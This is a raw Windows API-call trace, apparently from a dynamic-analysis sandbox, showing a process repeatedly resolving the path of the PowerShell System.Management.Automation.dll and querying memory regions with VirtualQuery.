	[0379.089] VirtualQuery (in: lpAddress=0x14b330, lpBuffer=0x14c1f0, dwLength=0x30 | out: lpBuffer=0x14c1f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.090] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.092] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.093] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.093] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.094] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14b6e0, lpBuffer=0x14c5a0, dwLength=0x30 | out: lpBuffer=0x14c5a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.095] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x56134b70, Data2=0xf162, Data3=0x48e2, Data4=([0]=0x9a, [1]=0x61, [2]=0xda, [3]=0x4a, [4]=0x87, [5]=0x9, [6]=0x79, [7]=0x82))) returned 0x0
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.100] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.101] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.101] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
